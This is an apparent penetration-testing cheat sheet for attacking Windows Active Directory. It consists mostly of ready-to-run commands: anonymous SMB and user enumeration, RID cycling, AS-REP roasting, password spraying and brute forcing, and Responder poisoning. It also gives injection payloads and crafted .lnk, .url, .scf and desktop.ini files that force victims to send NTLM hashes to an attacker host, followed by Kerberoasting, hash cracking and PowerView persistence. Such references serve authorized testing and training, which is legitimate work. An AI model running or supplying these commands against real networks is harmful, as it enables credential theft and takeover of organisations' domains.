Active Directory

AD enum (NO creds/sessions)

Basic recon

nxc smb <target>
enum4linux -a <target>
nmap -n -sV --script "ldap* and not brute" -p 389 <target>

SMB enum

# null session
nxc smb <IP> -u '' -p '' --shares
# guest
nxc smb <IP> -u 'guest' -p '' --shares

# null session
smbclient -N -L //<target>
# guest
smbclient -U 'guest%' -L //<target>
# conect to a share
smbclient [-U 'guest%'] [-N] //<target>/<share>

# null session
smbmap -H <target>
# guest
smbmap -u 'guest' -p '' -H <target>
# recursive listing
smbmap [-u 'guest' -p '] -H <target> -r [<share>]

User enum

#kerbrute
kerbrute userenum -d <domain> [--dc <target>] users.txt

# smb/rpc/ldap
nxc smb <target> [-u 'guest' -p ''] --users
rpcdump.py [[domain/]guest:@]<target>

# rid cycling
nxc smb [-u 'guest' -p ''] --rid-brute <target>
lookupsid.py [-no-pass] [[domain/]guest:@]<target>
seq 500 1500 xargs -P 50 -I{} rpcclient -U 'guest%' <target> -c 'lookupsids S-1-123-{}'

With valid username list

• AS-REP Roast

GetNPUsers.py -no-pass -usersfile valid_users.txt <domain>/

• Password Spraying/Brute Forcing

# brute forcing
nxc smb <target> -u valid_users.txt -p passwords.txt
kerbrute bruteuser -d <domain> [--dc <target>] passwords.txt '<user>'

# password spraying
nxc smb <target> -u valid_users.txt -p '<password>'
kerbrute passwordspray -d <domain> [--dc <target>] valid_users.txt '<password>'

Capturing NTLM hashes

Network poisoning

responder -I <interface>

Possible Attacks

https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/

• Via web vulnerability

If you discover a web vulnerability (such as LFI, SQLI, XXE, SSRF, SSTI) that allows you to include remote files, you can exploit it to steal the NTLM hash of the user running the process. For example:

# LFI
?page=\\10.10.10.10\test

# SSRF
?url=file://10.10.10.10/test

# SQL Injection
?id=1' union select null,load_file('\\\\10.10.10.10\\test'),null-- -
# MSSQL
?id=1' union select null,(select x from OpenRowset(BULK '\\10.10.10.10\test',SINGLE_CLOB) R(x)),null-- -
?id=1' union select null,(EXEC xp_cmdshell 'dir \\10.10.10.10\test'),null-- -

• Shortcut.lnk File

# Create a shortcut.lnk with PowerShell
$targetPath = "\\10.10.10.10\test" 
$shortcutPath = "C:\path\to\your\~shortcut.lnk" 
$WScriptShell = New-Object -ComObject WScript.Shell 
$shortcut = $WScriptShell.CreateShortcut($shortcutPath) 
$shortcut.TargetPath = $targetPath 
$shortcut.Save()

• Shortcut.url File

# Create a shortcut.url with PowerShell
echo '[InternetShortcut]' > ~shortcut.url
echo 'URL=file:///\\10.10.10.10\test' >> ~shortcut.url

• SCF File

echo '[Shell]' > ~file.scf
echo 'Command=2' >> ~file.scf
echo 'IconFile=explorer.exe,3' >> ~file.scf
echo '[Taskbar]' >> ~file.scf
echo 'Command=ToggleDesktop' >> ~file.scf
echo '[InternetShortcut]' >> ~file.scf
echo 'URL=file:///\\10.10.10.10\test' >> ~file.scf

• Desktop.ini File

echo '[.ShellClassInfo]' > desktop.ini
echo 'IconResource=\\10.10.10.10\test' >> desktop.ini
attrib +s +h desktop.ini

AD enum (WITH creds/sessions)

BloodHound enum

You have to configure your neo4j and bloodhound on your machine, then:

# neo4j
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk/ && neo4j console
# bloodhound
bloodhound

SharpHound

https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

# EXE
.\SharpHound.exe -CollectionMethods All
# PS1
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethods All -OutputDirectory .

Kerberoast

If you find this error from Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) it's because of your local time, you need to synchronise the host with the DC. There are a few options:

ntpdate <target>
rdate -n <target>

Attack

GetUserSPNs.py -request [-dc-ip <target>] <domain>/<user>:<password>

Cracking

john --format=krb5tgs --wordlist=passwords.txt hashes
hashcat -m 13100 --force -a 0 hashes passwords.txt

Persistence

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

#PowerView
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='test/test'} -verbose